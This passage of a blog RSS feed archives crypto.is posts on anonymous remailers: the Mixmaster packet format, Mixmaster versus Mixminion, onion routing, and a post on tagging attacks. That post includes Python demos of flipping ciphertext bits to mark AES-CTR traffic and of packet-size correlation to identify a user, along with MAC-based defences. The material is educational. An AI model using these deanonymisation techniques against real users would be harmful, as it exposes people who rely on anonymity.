<fieldset id="two_payload"><legend>Mix Payload</legend><fieldset id="two_payload_inner"><span>Indecipherable Data</span></fieldset></fieldset></fieldset>
</pre>
</div>
</div>

<h3>Transport</h3>

<p>The above is the binary format of the protocol.  The Mixmaster packets are then encoded as follows before transit:</p>

<pre>::
Remailer-Type: Mixmaster [version number]

-----BEGIN REMAILER MESSAGE-----
[packet length ]
[message digest]
[encoded packet]
-----END REMAILER MESSAGE-----</pre>

<p>Because the Mix Payload is padded to a constant size, and there are always 20 Mix Headers, a Mix Message is a constant size, and the packet length field is always 20480.  The Message Digest is computed over the encrypted, binary representation of the Mix Headers+Payload and then base64-ed.  Finally, the binary headers+payload themselves are encoded in base64 and broken into lines of 40 characters.</p>
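<p>To make the arithmetic concrete, here is a short Python sketch of the size calculation and transport encoding.  (The 512-byte per-header size is derived from the figures in this post: 20 headers plus a 10240-byte payload must total 20480 bytes.)</p>

```python
import base64
import textwrap

NUM_HEADERS = 20
HEADER_SIZE = 512         # 20 headers * 512 bytes = 10240 bytes
PAYLOAD_SIZE = 10236 + 4  # padded payload plus its 4-byte length field

# A dummy all-zero packet of the constant Mixmaster message size.
packet = bytes(NUM_HEADERS * HEADER_SIZE + PAYLOAD_SIZE)
assert len(packet) == 20480   # the constant packet length field

# The binary headers+payload are base64-ed and broken into 40-character lines.
lines = textwrap.wrap(base64.b64encode(packet).decode('ascii'), 40)
assert all(len(line) <= 40 for line in lines)
```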

<h3>Notes</h3>

<p>Some other notes about the Mixmaster Packet Format, tersely:

<ul>
<li>The Mix Payload packet is a constant 10236 bytes (plus a 4-byte length field) - any message larger than that must be split into message chunks (which we'll talk more about in another blog post).  Any message smaller than that is still padded to that size.</li>
<li>Obviously, there is only room for 20 Mix Headers, so the maximum hop length of a Mixmaster message is 20 hops.</li>
<li>The format conceals the length of the path from each intermediate hop - if you're not the final hop, you don't know how many more hops there are.</li>
<li>The raw packet format, shown above, has many distinct markers, making it easy to reliably detect it in transit.  (This is especially bad for Mixmaster, do you know why?  Hint: check out the <a href="/blog-cryptodotis-remailers_weve_got.html">second blog post</a>.)</li>
<li>The algorithm and key lengths are hardcoded into the specification, with no room for alternatives.  Thus we are stuck with
    <ul>
    <li>RSA 1024 with PKCS #1 v1.5 Padding</li>
    <li>EDE Triple DES in CBC Mode</li>
    <li>MD5 as Message Digest Algorithm</li>
    </ul></li>
<li>Replay prevention is often built into the packet format, at least partly.  In the Mixmaster specification, a server keeps track of all Packet IDs seen so far, and if it sees an identical one, it will discard the message as a replay.  Mixmaster must eventually expire old Packet IDs, so a message can be replayed once the server has expired its Packet ID.  We'll talk more about replay attacks in a future blog post also.</li>
<li>The format is vulnerable to Tagging Attacks, which I'll go over in more detail with an example in <a href="/blog-cryptodotis-tagging_attack_on_mixmaster.html">a future blog post.</a></li>
</ul>
</p>
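<p>To illustrate the Packet ID replay check described above, here is a minimal sketch in Python (a hypothetical cache for illustration, not Mixmaster's actual implementation):</p>

```python
import time

class ReplayCache:
    """Remember recently seen Packet IDs; discard duplicates as replays."""
    def __init__(self, ttl_seconds):
        self.ttl = ttl_seconds
        self.seen = {}  # packet_id -> time first seen

    def accept(self, packet_id, now=None):
        now = time.time() if now is None else now
        # Expire old IDs - after expiry, a replayed packet is NOT detected.
        self.seen = {p: t for p, t in self.seen.items() if now - t < self.ttl}
        if packet_id in self.seen:
            return False  # replay: discard the message
        self.seen[packet_id] = now
        return True

cache = ReplayCache(ttl_seconds=3600)
assert cache.accept(b'packet-id-1', now=0) is True
assert cache.accept(b'packet-id-1', now=10) is False    # replay, discarded
assert cache.accept(b'packet-id-1', now=7200) is True   # expired: replay succeeds
```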



<script type="text/javascript">
$("#mixmaster_accordian").accordion({
    collapsible: true,
    active: false,
    heightStyle: 'content',
    beforeActivate: function(event, ui) {
        $('#arrow').css('display', 'none');
    }});
</script>

<p><em style="font-size:small;">This blog post is licensed under <a href="http://creativecommons.org/licenses/by/3.0/us/">Creative Commons Attribution 3.0 United States License</a> and is inspired by, and makes heavy use of, the images produced by the EFF & Tor Project <a href="https://www.torproject.org/about/overview.html.en">here</a>.</em></p>

<div style="display:none" id="arrow"><img src="/resources/cryptodotis/post4/arrow.gif"/><span style="display: table-cell; vertical-align: middle; font-weight:bold;font-size:large;padding:3px;border:1px dashed grey;background:white;">Testing Words</span></div>

<div id="navfloat">
    <ul>
    <li class="" id="navprev" onclick="animate_prev();"><img src="/resources/cryptodotis/post4/back.png" />Previous Step</li>
	<li class="" id="navclose" onclick="animate_close();"><img src="/resources/cryptodotis/post4/down.png" />Close</li>
	<li class="" id="navnext" onclick="animate_next();"><img src="/resources/cryptodotis/post4/forward.png" />Next Step</li>
    </ul>
</div>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-cryptodotis-tagging_attacks.html</guid>
		<title>Tagging Attacks</title>
		<pubDate>05 Jan 2013 23:46:00 EST</pubDate>
		<description><![CDATA[
<style type="text/css">
#navfloat {
 position:fixed;
 top:0px;
 left: 50px;
 border-width: 0px 1px 1px 1px;
 border-color: black;
 border-style: solid;
 background-color:white;
 padding:15px;
}
#navfloat btn {
 font-style: normal;
}

.packet {
    font-style: italic;
    font-variant: small-caps;
    font-family: monospace;
}
pre {
    padding-left:30px;
}
.footnote:before {
    content: 'Footnote: '
}
.footnote {
    font-style: italic;
    font-size: small;
    font-family: Cambria,'Palatino Linotype','Book Antiqua','URW Palladio L',serif;
}
</style>

<p><em>This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.</em></p>

<p>A <strong>Tagging Attack</strong> is a class of attack that allows an adversary to recognize traffic at a later date by modifying it.  It is best illustrated by an example: consider a simple setup where clients communicate with a server using AES in CTR mode, with a pre-shared key for simplicity.</p>

<p><img src="/resources/cryptodotis/post3/intro.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block" /></p>

<p>An attacker observes the <span class="packet">N</span> clients connected to the server, and sees the outgoing connections to websites, but cannot be certain which client is requesting which resource. The attacker can use a tagging attack to be certain what resource a client is requesting.  <span class="footnote">For the purposes of this illustration we will ignore the passive length-based correlation available to the attacker, and focus on the tagging attack.</span>  CTR decryption works by XORing the ciphertext with the keystream to produce the plaintext:</p>

<p><img src="https://upload.wikimedia.org/wikipedia/commons/3/34/Ctr_decryption.png" style="margin-left:auto; margin-right:auto; display:block"/></p>

<p>An attacker will modify the ciphertext slightly.  Specifically, they will XOR the first byte of the ciphertext with <span class="packet">0x20</span>.  Why 0x20? Because in ASCII, 0x20 is the single bit that separates uppercase letters from lowercase ones - a special value that will allow every party involved to continue as normal, while allowing the attacker to detect the tag.  Let's look at it in detail.  Consider the following Plaintext, Keystream, and Ciphertext.</p>

<pre>
HTTP:       G  E  T     /     H  T  T  P  /  1  .  1  \n H  o  s  t  :  ...
Plaintext:  47 45 54 20 2f 20 48 54 54 50 2f 31 2e 31 0A 48 6f 73 74 3a ...

Keystream:  c3 91 f0 c3 74 90 cf dd 91 24 5c 65 1d 2c bd 79 1b 99 48 c0 ...
      XOR:  -----------------------------------------------------------
Ciphertext: 84 D4 A4 E3 5B B0 87 89 C5 74 73 54 33 1D B7 31 74 EA 3C FA ...
</pre>

<p>The attacker sees this ciphertext as it leaves the client, and will modify the first byte of it.</p>

<pre>
Ciphertext: 84 D4 A4 E3 5B B0 87 89 C5 74 73 54 33 1D B7 31 74 EA 3C FA ...
Attacker:   20 
       XOR: -----------------------------------------------------------
Ciphertext':A4 D4 A4 E3 5B B0 87 89 C5 74 73 54 33 1D B7 31 74 EA 3C FA ...
</pre>

<p><img src="/resources/cryptodotis/post3/tagging.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block" /></p>

<p>Now the server will receive it, produce the same keystream, decrypt it, and forward it on to the appropriate server.</p>

<pre>
Ciphertext':A4 D4 A4 E3 5B B0 87 89 C5 74 73 54 33 1D B7 31 74 EA 3C FA ...
Keystream:  c3 91 f0 c3 74 90 cf dd 91 24 5c 65 1d 2c bd 79 1b 99 48 c0 ...
       XOR: -----------------------------------------------------------
Plaintext:  67 45 54 20 2f 20 48 54 54 50 2f 31 2e 31 0A 48 6f 73 74 3a ...

HTTP:       g  E  T     /     H  T  T  P  /  1  .  1  \n H  o  s  t  :  ...
</pre>

<p>But observe what the attacker has done!  The attacker has changed the uppercase <span class="packet">GET</span> to <span class="packet">gET</span>.  No client will send an HTTP request in that form, but no server will reject it.  The attacker then knows that whatever request comes out in that form was from the client they modified going in. <span class="footnote">A cool thing about this value is that it will also change POST to pOST, so it works on both request types.</span></p>
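<p>The whole exchange fits in a few lines of Python, using the example keystream from above:</p>

```python
# CTR decryption is plaintext = ciphertext XOR keystream, so flipping a bit
# in the ciphertext flips the same bit in the recovered plaintext.
plaintext = b"GET / HTTP/1.1\nHost:"
keystream = bytes.fromhex("c391f0c37490cfdd91245c651d2cbd791b9948c0")
ciphertext = bytes(p ^ k for p, k in zip(plaintext, keystream))

# The attacker tags the stream: XOR the first ciphertext byte with 0x20.
tagged = bytes([ciphertext[0] ^ 0x20]) + ciphertext[1:]

# The server decrypts as usual; the tag survives as a case flip.
recovered = bytes(c ^ k for c, k in zip(tagged, keystream))
assert recovered == b"gET / HTTP/1.1\nHost:"
```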


<h2>Applicability To Cryptographic Primitives</h2>

<p>Tagging attacks are easiest when the underlying cryptographic primitive is homomorphic with regard to an operation.  That's a fancy way of saying the ciphertext may be modified by an operation, and the modification affects the plaintext in the same way.  Homomorphic encryption is a bit of a buzzword, so hearing that RSA is homomorphic may come as a surprise - but it's true.  RSA, and a number of other primitives, are <a href="https://en.wikipedia.org/wiki/Homomorphic_encryption">partially homomorphic</a>. <span class="footnote">Only bare RSA is homomorphic, padded RSA is not.  For this and many more reasons - never use bare RSA.</span></p>
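<p>Bare RSA's homomorphism is easy to demonstrate with toy parameters (the tiny primes below are purely illustrative - real keys are far larger, and padded RSA does not behave this way):</p>

```python
# Toy "bare" RSA showing the multiplicative homomorphism an attacker can
# exploit: Enc(a) * Enc(b) mod n is a valid encryption of a * b.
p, q, e = 61, 53, 17
n = p * q                          # 3233
d = pow(e, -1, (p - 1) * (q - 1))  # private exponent

def enc(m):
    return pow(m, e, n)

def dec(c):
    return pow(c, d, n)

a, b = 7, 6
c = (enc(a) * enc(b)) % n   # attacker multiplies two ciphertexts...
assert dec(c) == a * b      # ...which multiplies the underlying plaintexts
```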

<p>And as demonstrated earlier, block cipher modes may also be homomorphic.  We demonstrated a tagging attack on Counter Mode (CTR); it is similarly trivial in Output Feedback Mode (OFB).  It is also possible in Cipher Block Chaining (CBC) and Cipher Feedback Mode (CFB).  Other block cipher modes may be similarly vulnerable.</p>

<p>However, a tagging attack <strong>does not require homomorphism</strong>.  Homomorphism merely makes the attack easier to weaponize!  It's also entirely possible to mangle ciphertext to cause an error, and by observing the response to the error, you can perform the correlation.  In the future, we'll show a practical tagging attack on a real, deployed, anonymity system.</p>

<h2>Commonalities With Passive Correlation Attacks</h2>

<p>The goal of a tagging attack is to recognize traffic after it traverses an uncontrolled node.  However, a tagging attack is not the only way to accomplish this goal.  In fact, a passive correlation attack may be even easier.  Consider a scenario where a number of clients are connected to a Facebook chat server, and they are periodically sending and receiving chat messages:</p>

<p><img src="/resources/cryptodotis/post3/facebook.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block" /></p>

<p>I want to know which of these connected clients is a particular user on Facebook.  I have two easy ways to do this.  First, I can simply watch which clients receive messages when I send messages to the user.  I can't see inside their traffic, but I can see the size of the traffic, so I know when they receive a message.  In this case, I've narrowed it down to Alice and David.  I can keep doing this until I've figured it out conclusively.</p>

<p><img src="/resources/cryptodotis/post3/facebook-timing.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block" /></p>

<p>However, if clients are sending and receiving messages constantly, this may be tricky to achieve accurately with only a few messages.  I can get much higher accuracy with a single message... by sending a huge message.  Most chats are small, a few sentences.  By sending a huge message, up to the maximum limit, I can easily see which client receives a correspondingly huge message:</p>

<p><img src="/resources/cryptodotis/post3/facebook-size.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block" /></p>

<p>This correlation attack does not require an adversary to modify any traffic, so it doesn't fit the standard definition of a 'tagging attack'.  This type of correlation, based on packet sizes and timings, is particularly damaging against low-latency mix networks like Tor.  However, with enough data, it can also work against high-latency mix networks like remailers.  We're going to talk a lot more about these passive correlation attacks in the future.</p>
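<p>A sketch of the size-based correlation in Python, with purely hypothetical traffic numbers:</p>

```python
# Send an unusually large message, then match it to the client whose
# inbound traffic grew by roughly that amount. All sizes are made up.
sent_size = 64000  # bytes - near the maximum chat message size

received = {  # bytes each monitored client received in the same window
    'Alice': 1200, 'Bob': 900, 'Carol': 64310, 'David': 1100,
}
suspect = min(received, key=lambda client: abs(received[client] - sent_size))
assert suspect == 'Carol'
```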

<h2>Preventing Tagging Attacks</h2>

<p>The goal of a tagging attack is to recognize traffic after it traverses an uncontrolled node.  Therefore, to prevent the attack from succeeding, the uncontrolled node must recognize that the traffic has been tagged, and drop it.  The key goal is to provide integrity over the entirety of the message.  There are a few different techniques to do so.  For example, you can compute a MAC of the ciphertext and transmit it along with the message:</p>

<pre>
Message:    A4 D4 A4 E3 5B B0 87 89 C5 74 73 54 33 1D B7 31 74 EA 3C FA 73 C8 3B A5 9C 7F 1D
            |________________________________________________| |___________________________|
                                Ciphertext                           MAC of Ciphertext
</pre>

<p>If the whole of the message is protected with a MAC, and the MAC is computed over the ciphertext, we can recognize any modification.  An attacker must modify either the ciphertext or the MAC, and if either is modified the MAC will not verify correctly.  If the MAC doesn't verify correctly, the node discards it.</p>
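<p>A sketch of that check in Python, using HMAC-SHA256 as the MAC over the ciphertext (encrypt-then-MAC; the key and ciphertext here are illustrative):</p>

```python
import hashlib
import hmac

MAC_LEN = 32  # HMAC-SHA256 digest size

def protect(mac_key, ciphertext):
    # Encrypt-then-MAC: append a MAC computed over the ciphertext.
    return ciphertext + hmac.new(mac_key, ciphertext, hashlib.sha256).digest()

def verify(mac_key, message):
    ciphertext, tag = message[:-MAC_LEN], message[-MAC_LEN:]
    expected = hmac.new(mac_key, ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError('MAC mismatch - tagged or corrupted, drop it')
    return ciphertext

key = b'shared-mac-key'
message = protect(key, b'\xa4\xd4\xa4\xe3')
assert verify(key, message) == b'\xa4\xd4\xa4\xe3'

# A tagging attempt flips a ciphertext bit - the MAC no longer verifies.
tampered = bytes([message[0] ^ 0x20]) + message[1:]
try:
    verify(key, tampered)
    raise AssertionError('tag should have been detected')
except ValueError:
    pass
```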

<p>Another technique to provide integrity is to use an <a href="http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html">authenticated encryption mode</a>.  With a correctly implemented authenticated encryption mode, a modification in the ciphertext will result in an exception or error state during decryption, and the node will not have plaintext to use.  Another primitive, which is more complicated, is to encrypt the entire message in a single block, using special constructions that allow for large block sizes such as BEAR or LIONESS.  If the entire message is a single block, any bit that is flipped will cause the entire block to decrypt to something completely unrecognizable by the intermediate node (hopefully). <span class="footnote">Using a large block size is generally a very tricky thing, and should not be done without a very deep background in cryptography.</span></p>  


<h2>More</h2>

<p>Tagging Attacks have been written about before, but generally in academic papers - for more detail, we recommend <a href="https://blog.torproject.org/blog/one-cell-enough">"One cell is enough to break Tor's anonymity"</a> on the Tor Project blog, and the references it includes.  However, the security trade-offs made by Tor in relation to tagging attacks should not be accepted as carte blanche to ignore the attack in new systems.  For example, because Tor is a low-latency system, and remailers are a high-latency system, tagging attacks <em>may</em> provide higher confidence levels compared to pure correlation-based attacks.</p>

<p><em style="font-size:small;">This blog post is licensed under <a href="http://creativecommons.org/licenses/by/3.0/us/">Creative Commons Attribution 3.0 United States License</a> and is inspired by, and makes heavy use of, the images produced by the EFF & Tor Project <a href="https://www.torproject.org/about/overview.html.en">here</a>.</em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-cryptodotis-remailers_weve_got.html</guid>
		<title>Remailers We've Got</title>
		<pubDate>05 Jan 2013 23:45:00 EST</pubDate>
		<description><![CDATA[
<style type="text/css">
.packet {
    font-style: italic;
    font-variant: small-caps;
    font-family: monospace;
}
.footnote:before {
    content: 'Footnote: '
}
.footnote {
    font-style: italic;
    font-size: small;
    font-family: Cambria,'Palatino Linotype','Book Antiqua','URW Palladio L',serif;
}
</style>

<p><em>This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.</em></p>

<p>There are two main implemented remailer networks in operation: Mixmaster and Mixminion.  Mixmaster was written in the early 90s by Lance Cottrell, and was maintained for a number of years by Len Sassaman.  Mixminion was written in the early 2000s by Nick Mathewson, based on a research paper he wrote with George Danezis and Roger Dingledine.  A third, <a href="https://en.wikipedia.org/wiki/Cypherpunk_anonymous_remailer">Cypherpunk Remailers</a>, exists as well, although it is mostly supported as a compatibility layer in the Mixmaster software.  Although conceptually they all do the same thing - allow the sending of anonymous emails - there are a number of design and implementation differences.</p>

<p>In Mixmaster, when you compose your Russian-doll nested messages to each remailer, you send the message to the first node using normal email - SMTP.  Each node subsequently sends it to the next node as an email message over SMTP.</p>

<img src="/resources/cryptodotis/post2/mixmaster.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block" />

<p>There are disadvantages to this approach.</p>
<ul>
 <li><em>The SMTP conversation between you and the first node is not encrypted</em>.  An attacker observing you would know you are sending messages to a remailer, even if they did not already know remailers existed or have a list of them.  <span class="footnote">It's important to note that the message is still encrypted, but the transport of the encrypted message is not itself encrypted.</span></li>
 <li><em>The SMTP conversation between each node is not encrypted</em>.  This allows an attacker to observe the encrypted messages sent between them.  The attacker could store the encrypted messages for later decryption if they compromise the server's private key. <span class="footnote">Again, the message is still encrypted, but the transport of the encrypted message is not itself encrypted.</span> <span class="footnote">There are some technicalities with StartTLS and DHE ciphersuites, but these should not be relied on.</span></li>
 <li><em>Each Mixmaster node must run an email server</em>. While running a webserver such as Apache or Nginx is very common today, with many guides and best practices available, running a mailserver is more esoteric - the guides are less common and more out of date, and it is not a common skill.</li>
</ul>
 
<p>However, in Mixminion, when you compose your nested message, you send it to the first node using a binary protocol inside an SSL connection.  That SSL connection uses an ephemeral key exchange, which provides Perfect Forward Secrecy (PFS).  PFS means that even if an attacker later compromises the server's long-term SSL key, they cannot decrypt a recorded conversation.  And if an attacker breaks one conversation, they cannot read any other conversation.  This is a very nice and robust property to provide, and by using SSL as a transport mechanism we get it essentially for free, without having to write any additional code.</p>

<img src="/resources/cryptodotis/post2/mixminion.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block" />

<p>The advantages of Mixminion's approach compared to Mixmaster's:</p>
<ul>
 <li><em>The conversation between you and the first node is encrypted using SSL</em>. Although an attacker who had a list of all remailer nodes would know you were speaking to one, an attacker who did not would see a normal SSL connection, extremely common on the web. <span class="footnote">With additional development, it would be possible to deploy 'bridge' Mixminion nodes, similar to Tor bridges, that an adversary was unable to enumerate.</span></li>
 <li><em>The conversation between each node is encrypted with SSL using an ephemeral handshake.</em> An attacker who observed the conversation can only know they are transmitting remailer messages if they know the computers are remailers a priori. Because the conversation is encrypted ephemerally, an attacker cannot coerce an operator to decrypt a traffic intercept later.  </li>
 <li><em>Only the exit Mixminion node must run an email server</em>. Because the nodes pass messages between themselves using a binary protocol inside of SSL, and not via email messages, the only node that must run an email server is the final node, where the message exits the remailer network and enters normal email.  While some Mixminion nodes must run email servers, many do not need to.</li>
</ul>
 
<p>Another major difference between Mixmaster and Mixminion is that Mixmaster is one-way.  You can send an email anonymously to an individual, but if you want them to be able to reply, you would have to give them a reply address.  Even if you choose a free email service and lie to them about your real name - this can still de-anonymize you, for example through a subpoena to the email provider.  Mixminion, however, allows replies through what are called 'Single Use Reply Blocks' or SURBs.  When I receive a message with a SURB, I can reply to the sender without knowing who the sender is.  We'll talk more about SURBs and reply-block based designs later as well.</p>

<p>There are a number of other differences between Mixmaster and Mixminion, including directory services, exit policies, and dummy traffic.  And there are a number of other topics and developments in anonymous email, including packet formats (like Sphinx) and nym-based reply methods (like Pynchon Gate).  We'll be covering more about these topics in the future.</p>

<p>Finally, before signing off, it's important to note that there are practical issues with both Mixmaster and Mixminion today.  Neither one of these should be relied on for strong anonymity.  Mixmaster, for example, makes use of 1024-bit RSA keys; and Mixminion has not been actively developed for years.</p>

<p><em style="font-size:small;">This blog post is licensed under <a href="http://creativecommons.org/licenses/by/3.0/us/">Creative Commons Attribution 3.0 United States License</a> and is inspired by, and makes heavy use of, the images produced by the EFF & Tor Project <a href="https://www.torproject.org/about/overview.html.en">here</a>.</em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-cryptodotis-what_is_a_remailer.html</guid>
		<title>What is a Remailer?</title>
		<pubDate>05 Jan 2013 23:44:00 EST</pubDate>
		<description><![CDATA[
<style type="text/css">
.packet {
    font-style: italic;
    font-variant: small-caps;
    font-family: monospace;
}
.footnote:before {
    content: 'Footnote: '
}
.footnote {
    font-style: italic;
    font-size: small;
    font-family: Cambria,'Palatino Linotype','Book Antiqua','URW Palladio L',serif;
}
</style>

<p><em>This blog post originally appeared on crypto.is. We've since shut down that website, so I have copied the blog post back to my own for archival purposes.</em></p>

<p>A remailer is a system that allows you to send anonymous email to a recipient - it re-mails messages for you.  There are a lot of reasons why people would want to send anonymous email.</p>

<ul>
 <li> Researchers and Survey Participants, who don't want to expose their opinions 
   on sensitive topics like religion or politics
 <li> Whistleblowers, who want to report illegal activity of a coworker, government or 
   company - but can't risk <a href="http://www.texasobserver.org/cover-story/intent-to-harm">losing their job or being prosecuted</a>
 <li> Journalists, who want to correspond with a source without exposing the source, 
   or being tracked down themselves.
 <li> Law Enforcement, who want to communicate with confidential sources or 
   undercover agents without risking their operational security
 <li> Activists, protesting against repressive regimes like the ones we've seen in 
   the Middle East
 <li> Consumers, who want to send feedback on a product or service
 <li> Individuals who don't trust their Internet Service Provider or Network Admin
</ul>

<p>In a series of blog posts, we're going to look at the theory and implementation of different remailing systems.  We'll assume you're familiar with some basics of cryptography - symmetric (secret-key) and asymmetric (public key) cryptography for the most part - and with the general idea of how <a href="https://www.torproject.org/">Tor</a> works.  If you don't know these things, you'll probably be able to follow along well enough, but may miss some of the comparisons.</p>

<h2>From The Ground Up</h2>

<p>If our goal is to send anonymous email, what is the simplest way we can accomplish this?  How about we just create an Open Relay that will not forward identifying information?  It will receive a connection, process the SMTP message, and send it on to the recipient, leaving out any of the sender's information.</p>
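As a toy sketch, the header-stripping step of such a relay might look like the following.  The header list and relay address are hypothetical, and a real relay would do this inside its SMTP handling - this only illustrates the idea of dropping the sender's identifying information before re-mailing:

```python
from email import message_from_string

# Hypothetical list of sender-identifying headers to drop.
IDENTIFYING = {"From", "Sender", "Received", "Return-Path",
               "Reply-To", "Message-ID", "User-Agent"}

def strip_identity(raw, relay_addr="anonymous@relay.example"):
    """Drop headers that identify the sender, then re-mail as the relay."""
    msg = message_from_string(raw)
    for header in list(msg.keys()):
        if header in IDENTIFYING or header.lower().startswith("x-"):
            del msg[header]          # removes every occurrence of the header
    msg["From"] = relay_addr         # the relay is now the nominal sender
    return msg.as_string()
```

The recipient (and anyone watching the recipient's mail server) sees only the relay's address, not the original sender's.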

<img src="/resources/cryptodotis/post1/pre1.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block;" />

<p>While this system does deliver mail - there are a number of problems that can compromise your anonymity.  For example, if you're being watched by an attacker, they can see the email you're sending!  SMTP goes over plaintext by default.  Clearly the solution is to encrypt the message so an attacker watching you cannot see it.  This could be done with TLS inside the SMTP conversation or via an out-of-band system such as PGP.</p>

<img src="/resources/cryptodotis/post1/pre2.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block" /> 

<p>This gains you some confidentiality, but there are still a number of issues.  Now, let us assume the attacker was watching the relay.  They would see the relay sending a message (and what the message was, and to whom) right after you connected to it.  They are able to correlate that message to you in nearly all situations.  To mitigate this correlation attack, the relay needs to hang onto a message for a little bit before it actually sends the message on.  If it collects a number of messages in a pool, and then flushes the pool, an attacker has a harder time figuring out who was sending a message to whom.  If they watch the relay, they will know <span class="packet">Alice</span>, <span class="packet">Bob</span>, <span class="packet">Charlie</span>, and <span class="packet">Dave</span> sent messages <span class="packet">M</span>, <span class="packet">N</span>, <span class="packet">O</span>, and <span class="packet">P</span> - but not which person sent which message.<span class="footnote">There are attacks on the pooling we presented, but we'll leave those to another blog post.</span> </p>

<img src="/resources/cryptodotis/post1/pre3.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block;" /> 

<p>This system still has several open questions.  For example, how did you learn about this relay, and how did you learn its public key?  This authentication step is incredibly difficult - and the general approach is to create some central directory service - that's the technique used by SSL on the Internet, DNSSEC, and even the Tor Project.  There are advantages and disadvantages to this: obviously a directory service is a centralized point of failure or censorship.  However, if a central directory service is <em>not</em> present, attackers can perform more successful correlation attacks by considering who knows about which relays.  Having a central directory service ensures all clients know about all relays.</p>

<img src="/resources/cryptodotis/post1/pre4.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block;" /> 

<p>So at this point our client will connect to a directory, get the list of all relays, and choose one at random.  (If they chose the same one all the time, correlation would be much easier.)  The client will connect to the relay, send their message, and the relay will hang onto it for a bit, collecting more messages, before forwarding it on.  But consider this - since you're picking a relay at random - it's possible the relay itself may be run by an adversary! If anyone can run a relay, so can your adversary.  Eventually you'll probably forward a message through that relay, and they can inspect the message and see who is sending it.  To overcome the relay itself being run by the adversary, we need to perform onion routing.  </p>

<p>Onion routing is when you deliver an encrypted message to a node, who decrypts it and finds an encrypted package for another node.  They can't decrypt this package, so all they can do is pass it to that next node - who decrypts it, and finds yet another encrypted package. All the way down the line until the last node finds the actual message, and delivers it.  By the time the package reaches the last node - the last node doesn't know who the message came from!  And the first node doesn't know who the package is being delivered to or what it says.</p>
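To make the layering concrete, here's a toy sketch in Python.  The XOR 'cipher' below (a SHA-256 keystream) is merely a stand-in for each node's real public-key encryption - it illustrates the nesting and provides no actual security:

```python
import hashlib
import json

def keystream(key, n):
    # Toy keystream: SHA-256 in counter mode.  NOT real crypto - a
    # stand-in for encrypting to each node's public key.
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]

def xor_layer(data, key):
    # XOR with the keystream; applying it twice recovers the data.
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

def wrap(message, recipient, path):
    """Build the onion: innermost layer (for the exit node) first.
    `path` is a list of (node_name, node_key), first hop to last."""
    next_hop, blob = recipient, message
    for name, key in reversed(path):
        layer = json.dumps({"next": next_hop, "inner": blob.hex()}).encode()
        blob = xor_layer(layer, key)   # only this node can peel this layer
        next_hop = name
    return next_hop, blob              # send `blob` to the first hop

def peel(blob, key):
    """What one node does: remove its layer, learning only the next hop."""
    layer = json.loads(xor_layer(blob, key).decode())
    return layer["next"], bytes.fromhex(layer["inner"])
```

Each node that calls `peel` sees only where the package goes next - the first node never learns the recipient, and the last never learns the sender.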

<img src="/resources/cryptodotis/post1/pre5.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block;" /> 

<p>While there are some tweaks in the actual implementations - which we will get to in future blog posts - this is basically how remailers work.  Let's look at it in-depth.</p>

<h2>The System Completed</h2>

<p>When you want to send an email, you first contact some form of directory service that tells you about the existing remailer nodes in the network.  You get the nodes, their public keys, and some statistics about their past reliability.  <span class="footnote">Because the directory service is telling you about the nodes and their keys - it's important that this service is trusted.  It'd be possible for a malicious directory service to tell you only about malicious nodes.  We'll talk more about Directory Servers and attacks on them later.</span></p>

<img src="/resources/cryptodotis/post1/step1.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block;" />

<p>After you've gotten the list of remailer nodes from the directory service, you choose a path through them.  The path can (theoretically) be any length that you like, and you choose the nodes at random - although you usually take into account their reliability.  This doesn't have to be done by the user, and is usually done automatically by the client software.  <span class="footnote">One of the many subtleties of maintaining anonymity is choosing a path in the same manner as everyone else choosing a path - if one implementation chooses 3 hops, and another 5 hops - this information can be used by an adversary.</span></p>

<img src="/resources/cryptodotis/post1/step2.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block;" />

<p>After you've chosen your path through the network, you take the email you want to send, and encrypt it in a package to each remailer - like Russian Dolls - and send it off through the network.</p>

<img src="/resources/cryptodotis/post1/step3.png" style="border:black solid 1px; padding:3px; margin-left:auto; margin-right:auto; display:block;" />

<p>By encrypting it successively to each hop in your path, you ensure that each node knows the least possible about who you are, who you're e-mailing, and the contents of the message.  By the time the message reaches the last hop, the last hop's administrator doesn't know who sent the message.  They don't even know who would <em>know</em> who sent the message.</p>


<table border=1 style="text-align:center">
    <tr>
        <th>Who</th>
        <th>Who they see talking</th>
        <th>What they see</th>
        <th>What they don't know</th>
    </tr>
    <tr>
        <td>Network Observer<br /> between You &amp; First Hop</td>
        <td><span style="color:red">You</span> -> First Hop</td>
        <td><img src="/resources/cryptodotis/post1/whole-message-red.png" />
        <td>Second &amp; Third hops, <span style="color:green">Recipient, Message</span></td>
    </tr>
    <tr>
        <td>First Hop</td>
        <td><span style="color:red">You</span> -> Second Hop
        <td><img src="/resources/cryptodotis/post1/whole-message-blue.png" />
        <td>Third hop, <span style="color:green">Recipient, Message</span></td>
    </tr>
    <tr>
        <td>Network Observer<br /> between First &amp; Second Hops</td>
        <td>First Hop -> Second Hop</td>
        <td><img src="/resources/cryptodotis/post1/bluewhole-message-blue.png" />
        <td><span style="color:green">Sender (You)</span>, Third hop, <span style="color:green">Recipient, Message</span></td>
    </tr>
